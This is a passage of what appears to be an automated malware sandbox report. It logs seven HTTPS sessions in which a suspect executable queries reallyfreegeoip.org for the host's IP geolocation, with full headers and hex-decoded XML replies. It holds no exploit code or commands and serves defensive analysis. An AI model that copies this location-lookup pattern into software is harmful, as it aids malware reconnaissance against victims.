                                                                                                                                            2024-11-07 14:19:31 UTC205INData Raw: 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                                                            Data Ascii: as</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            1192.168.2.849708188.114.96.34433648C:\Users\user\Desktop\Lpjrd6Wxad.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-11-07 14:19:33 UTC63OUTGET /xml/173.254.250.79 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            2024-11-07 14:19:33 UTC1217INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 07 Nov 2024 14:19:33 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 359
                                                                                                                                            Connection: close
                                                                                                                                            x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
                                                                                                                                            x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                                                            x-cache: Miss from cloudfront
                                                                                                                                            via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
                                                                                                                                            x-amz-cf-pop: DFW57-P5
                                                                                                                                            x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 32351
                                                                                                                                            Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vkSyiZeEztHwopDBFQ%2BPyL6z3Dy6yNtoQv0rJOZXdS2xip7SzAhNqcOcKb57%2FoZrCPv5DXoqez2aN8zW19T6BECK8g0tSBATIopfTr3nopq8jQGlDymy%2FFqLVRxFmunBUxDR0rse"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8dedf57ecbbf144c-DFW
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1496&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2367947&cwnd=247&unsent_bytes=0&cid=e6aa85e4fa4d4cb8&ts=159&x=0"
                                                                                                                                            2024-11-07 14:19:33 UTC152INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54
                                                                                                                                            Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>T
                                                                                                                                            2024-11-07 14:19:33 UTC207INData Raw: 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                                                            Data Ascii: exas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            2192.168.2.849710188.114.96.34433648C:\Users\user\Desktop\Lpjrd6Wxad.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-11-07 14:19:36 UTC87OUTGET /xml/173.254.250.79 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-11-07 14:19:36 UTC1221INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 07 Nov 2024 14:19:36 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 359
                                                                                                                                            Connection: close
                                                                                                                                            x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
                                                                                                                                            x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                                                            x-cache: Miss from cloudfront
                                                                                                                                            via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
                                                                                                                                            x-amz-cf-pop: DFW57-P5
                                                                                                                                            x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 32354
                                                                                                                                            Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rGEBUI1QDRcqBGzleCLZqqqODw6J38rYXwGEi1grAQTYhQYPL8LmMfmkUD3ojzPOTBdr%2FOyDz%2BhmP6u2y%2BxIH3a3klVZxGmCxSWNDuNpEPaUCRW%2F1xvNtcD1CDe501ckG10G9%2Fy3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8dedf590ca3aa912-DFW
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1628&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1691588&cwnd=159&unsent_bytes=0&cid=5dbf16d5112fa503&ts=157&x=0"
                                                                                                                                            2024-11-07 14:19:36 UTC148INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61
                                                                                                                                            Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNa
                                                                                                                                            2024-11-07 14:19:36 UTC211INData Raw: 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                                                            Data Ascii: me>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            3192.168.2.849713188.114.96.34433648C:\Users\user\Desktop\Lpjrd6Wxad.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-11-07 14:19:41 UTC87OUTGET /xml/173.254.250.79 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-11-07 14:19:41 UTC1227INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 07 Nov 2024 14:19:41 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 359
                                                                                                                                            Connection: close
                                                                                                                                            x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
                                                                                                                                            x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                                                            x-cache: Miss from cloudfront
                                                                                                                                            via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
                                                                                                                                            x-amz-cf-pop: DFW57-P5
                                                                                                                                            x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 32359
                                                                                                                                            Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8pIehSivwplrjZeW%2B3kas7myW%2FBjIlZnYInOMbDRj6LGlSfRzu4%2B%2FJrZSMsbVcbYo%2Fx8QfJ4%2FyJY6PxHJmvjETtWV6xsR8vauAMxPM8Xl4HhjU81s4qgs%2BxERKQ9p%2FTtHtO5fFwC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8dedf5b2b893e7bf-DFW
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1820&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1607103&cwnd=251&unsent_bytes=0&cid=f9016722dd1224ea&ts=148&x=0"
                                                                                                                                            2024-11-07 14:19:41 UTC142INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65
                                                                                                                                            Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Re
                                                                                                                                            2024-11-07 14:19:41 UTC217INData Raw: 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                                                            Data Ascii: gionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            4192.168.2.849717188.114.96.34433648C:\Users\user\Desktop\Lpjrd6Wxad.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-11-07 14:19:43 UTC63OUTGET /xml/173.254.250.79 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            2024-11-07 14:19:43 UTC1219INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 07 Nov 2024 14:19:43 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 359
                                                                                                                                            Connection: close
                                                                                                                                            x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
                                                                                                                                            x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                                                            x-cache: Miss from cloudfront
                                                                                                                                            via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
                                                                                                                                            x-amz-cf-pop: DFW57-P5
                                                                                                                                            x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 32361
                                                                                                                                            Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZF9hn5CmWv7Zr410R4McFl3ns1irVUXnN4VIT%2F%2FTSsvVoexA5yAfPGfKEQrlJFa1zIDbowdbGROT%2Bde56OqaShP20sySVWIKodrr5ePB5bgQkoyjjedKDglw0zj7K%2F18RF2YhqEL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8dedf5bd1875e94e-DFW
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1992&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1430830&cwnd=251&unsent_bytes=0&cid=0f9c121cd21a6556&ts=226&x=0"
                                                                                                                                            2024-11-07 14:19:43 UTC150INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65
                                                                                                                                            Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName
                                                                                                                                            2024-11-07 14:19:43 UTC209INData Raw: 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                                                            Data Ascii: >Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            5192.168.2.849722188.114.96.34433648C:\Users\user\Desktop\Lpjrd6Wxad.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-11-07 14:19:45 UTC63OUTGET /xml/173.254.250.79 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            2024-11-07 14:19:46 UTC1219INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 07 Nov 2024 14:19:46 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 359
                                                                                                                                            Connection: close
                                                                                                                                            x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
                                                                                                                                            x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                                                            x-cache: Miss from cloudfront
                                                                                                                                            via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
                                                                                                                                            x-amz-cf-pop: DFW57-P5
                                                                                                                                            x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 32364
                                                                                                                                            Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JNkXzpNekCDQFw2I2PaP8x1%2FebSkimn9sqAAZkHuCx%2FlrkYqJsniJm2FqXvTODKNZd3lh%2BnHT95rwmPiyB%2BiR2mMpP5Q5Ru8UMBVhsu4GeH72viRjbO6tfNubQq3VKCvThiezDtd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8dedf5cc9f7e6c37-DFW
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1161&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2362153&cwnd=230&unsent_bytes=0&cid=98c68ef282b4430e&ts=190&x=0"
                                                                                                                                            2024-11-07 14:19:46 UTC150INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65
                                                                                                                                            Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName
                                                                                                                                            2024-11-07 14:19:46 UTC209INData Raw: 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                                                            Data Ascii: >Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            6192.168.2.849724188.114.96.34433648C:\Users\user\Desktop\Lpjrd6Wxad.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-11-07 14:19:48 UTC87OUTGET /xml/173.254.250.79 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-11-07 14:19:48 UTC1223INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 07 Nov 2024 14:19:48 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 359
                                                                                                                                            Connection: close
                                                                                                                                            x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
                                                                                                                                            x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                                                            x-cache: Miss from cloudfront
                                                                                                                                            via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
                                                                                                                                            x-amz-cf-pop: DFW57-P5
                                                                                                                                            x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 32366
                                                                                                                                            Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AkWgGN7qlnEtA9XojL3JzFKJ2ONlJ078Jxetto4%2FgdBAL9jNHvUFdmXh4k%2B994HUh9MnRQW3AuttHs3y7hfGPgvcVtEGWxy3VEymR%2B%2FOc%2FnJO%2FuWvUvkMjI54dd6mpG8uH0XAE6v"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8dedf5dd0fdd6b89-DFW
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1465&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2130978&cwnd=251&unsent_bytes=0&cid=04aeb016f79e9be5&ts=170&x=0"
                                                                                                                                            2024-11-07 14:19:48 UTC146INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e
                                                                                                                                            Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Region
                                                                                                                                            2024-11-07 14:19:48 UTC213INData Raw: 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                                                                            Data Ascii: Name>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            7192.168.2.849726188.114.96.34433648C:\Users\user\Desktop\Lpjrd6Wxad.exe
